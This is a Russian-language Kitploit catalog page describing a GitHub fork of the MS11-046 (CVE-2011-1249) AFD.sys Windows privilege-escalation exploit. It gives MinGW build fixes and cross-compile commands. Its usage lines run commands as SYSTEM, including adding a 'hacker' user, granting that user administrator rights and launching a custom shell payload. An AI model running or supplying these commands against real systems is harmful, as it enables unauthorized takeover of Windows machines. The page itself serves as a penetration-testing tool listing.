Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) AFD повышение привилегий — исправление кросскомпиляции MinGW + поддержка пользовательских команд

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ms11-046-mingw

CVE-2011-1249 / MS11-046 — эскалация привилегий AFD.sys для Windows x86.

Оригинальный эксплойт от Томислава Паскалева (EDB-40564). Этот форк исправляет ошибки кросс-компиляции MinGW и добавляет выполнение пользовательской команды через argv[1].


Изменения по сравнению с оригиналом

#ИзменениеПричина
1FARPROC ZwQuerySystemInformation → типизированный указатель на функцию (pZwQuerySystemInformation)Строгая проверка типов MinGW отклоняет вызов нулевого параметра FARPROC с аргументами — компиляция завершается ошибкой too many arguments to function
2Массивы securityPatches[] помечены staticМассивы, объявленные внутри блоков if/else, размещаются в стеке и выходят из области видимости; без static указатели становятся висячими
3Пользовательская команда через argv[1]Запуск любой команды от имени SYSTEM вместо жестко заданного cmd.exe

Проблема

Компиляция оригинала с MinGW завершается ошибкой:

root@kitploit:~
ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC — это универсальный указатель на функцию, объявленный с нулевыми параметрами. MinGW применяет строгую проверку типов и отклоняет вызов с аргументами. Исправление заключается в использовании типизированного указателя на функцию с правильной сигнатурой.

Существуют предварительно скомпилированные бинарники (например, SecWiki/windows-kernel-exploits), но они не поддерживают пользовательские команды.


Кросс-компиляция в Linux (MinGW)

root@kitploit:~
sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

Использование

root@kitploit:~
ms11-046.exe                                             # default: spawns cmd.exe as SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # add a user as SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # add to local admins
ms11-046.exe "c:\windows\temp\shell.exe"                 # run a custom payload as SYSTEM

Ссылки

  • MS11-046 — Бюллетень безопасности Microsoft
  • CVE-2011-1249 — Национальная база уязвимостей
  • EDB-40564 — оригинальный эксплойт
Скачать инструмент